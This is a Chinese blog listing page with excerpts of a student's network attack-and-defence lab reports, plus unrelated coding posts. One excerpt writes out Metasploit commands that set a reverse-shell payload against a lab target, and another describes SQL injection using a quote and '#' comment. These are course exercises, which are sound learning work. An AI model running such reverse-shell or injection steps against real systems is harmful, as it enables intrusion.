- 博客(12)
- 收藏
- 关注
RSS订阅原创 20232807 2023-2024-2 《网络攻防实践》实践十一报告
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。③如果解密出的地址给出的是网页或脚本文件,请继续解密。(2)取证分析实践—网页木马攻击场景分析。
2024-05-30 21:54:42
363
原创 20232807 2023-2024-2 《网络攻防实践》实践十报告
员工是一般角色,可以查看或更新自己的个人资料信息。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。SQL中#表示注释,在输入账号后紧接着输入一个单引号’将筛选条件终止,后面的命令都将注释掉,那么这条SQL语句就能够直接被执行。
2024-05-23 22:20:15
554
1
原创 20232807 2023-2024-2 《网络攻防实践》实践九报告
这次实验主要完成了手工修改可执行文件,改变执行的程,直接跳转到getShell函数;利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数;注入一个自己制作的shellcode并运行这段shellcode。在实验过程中深刻理解了缓冲区溢出攻击的原理和危害以及制作shellcode时需要绕过许多保护机制。在实验过程中还发现了很多不足,需要不断提高实践操作能力。
2024-05-16 23:07:42
849
原创 20232807 2023-2024-2 《网络攻防实践》实践八报告
在这次实验中我学习到了对恶意代码攻击进行分析,了解到了攻击的方式,通过对恶意代码的分析学习到了脱壳、反汇编、字符串提取的知识,提高了面对海量的网络数据提取关键信息能力,在实践过程中还需不断提高知识水平,提高实践水平。
2024-05-09 22:34:17
599
原创 20232807 2023-2024-2 《网络攻防实践》实践七报告
在这次的实验中,我学习到了使用Metasploit进行Linux远程渗透攻击,还进行了攻防对抗实践,更加深入的了解了Linux攻防技术以及分析攻方的攻击过程,这次实践也遇到了一些难题,通过上网查找资料、和同学交流解决了问题,也证明我的技术水平和实践操作能力还有待提高。攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。再输入ifconfig查看ip地址,发现已变成靶机的ip地址,证明已经成功进入靶机。
2024-05-05 13:37:15
909
1
原创 20232807 2023-2024-2 《网络攻防实践》实践六报告
选择第五个进行攻击,输入命令行set payload generic/shell_reverse_tcp设置载荷,输入命令行set RHOST 192.168.200.124设置攻击主机,输入命令行set LHOST 192.168.200.2设置靶机。源地址为192.168.200.4,源端口为4444,目的地址为192.168.200.124,目的端口为1447,攻击发起时间从ARP协议的询问开始。(1)定期更新和维护软件:确保你的数据库系统和相关软件都是最新版本,并及时应用厂商发布的安全补丁和更新。
2024-05-02 20:33:29
569
2
原创 20232807 2023-2024-2 《网络攻防实践》实践5报告
通过这次实验学习到了防火墙的配置,使用snort从pcap文件读取网络日志数据源以及虚拟网络攻防环境中蜜网网关的防火墙和IDS/IPS配置规则,这次实验出现了一些问题,这也表明我的实践能力还有待加强。
2024-04-18 20:50:08
581
1
转载 request.post无法获得数据(无响应)的方法
1… post请求方式编码有3种:2. post一贯的用法是:requests.post(url,data), 具体我们使用不同的编码方式来有所不同:1)、传统表单post请求(x-www-form-urlencoded)import requests,json url = 'http://httpbin.org/post'data = {'key1':'value1','key2':'value2'}r =requests.post(url,data)print(r.text)2)Re
2022-05-10 22:03:48
3124
原创 cloud.database.collection is not a function报错
cloud.database.collection is not a function出现报错,我找了好久的问题,发现其他特别简单。这个括号我没有写,就显示报错了,哈哈哈哈哈哈哈
2022-05-10 10:07:33
749
原创 微信小程序云数据库的分页提取,解决提取大量数据的耗时问题
解决提取大量数据耗时问题首先先建立一个较大的数据库,最好数据量超过80,如图:然后在页面的wxml文件写入页面结构,如下:<scroll-view scroll-y="true" bindscrolltolower="searchScrollLower"> <view class="result-item" wx:for="{{dataList}}" wx:key="item"> <text class="title">{{item.schoolNam
2022-04-27 21:05:57
1742
转载 微信小程序scroll-view消除滚动条及云开发数据库每次取数据只能取20个的方法
一、微信小程序scroll-view消除滚动条在当前页面的.wxss文件中增加如下代码:::-webkit-scrollbar { width: 0; height: 0; color: transparent; }二、解决微信小程序云开发数据库每次取数据只能取20个的方法预备知识:使用async和await使得代码从异步变为同步,通俗的来讲就是若要使用数据库的信息时,会等数据库读取成功后,再将值传递给它。举个例子:若没加async和await时是这样的:success外面
2022-04-25 22:18:34
1077
原创 初学OpenGL-对函数的理解
glVertex3f函数和glTranslatef函数以及glLoadIdentity函数1、glVertex3f(x,y,z):是定义一个顶点。例如:glVertex3f(1.0,0.0,0.0)是定义一个在(1.0,0.0,0,0)的点,一般与glBegin()、glEnd()函数连用,来绘制图像。glBegin()函数中括号里的内容不同,其绘制的图像大有不同。2、glTranslatef()函数其实是将坐标轴移动,在当前坐标系下,使用glTranslatef函数将坐标轴平移,一般为了保证易懂,先将
2020-12-16 09:31:24
3611
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人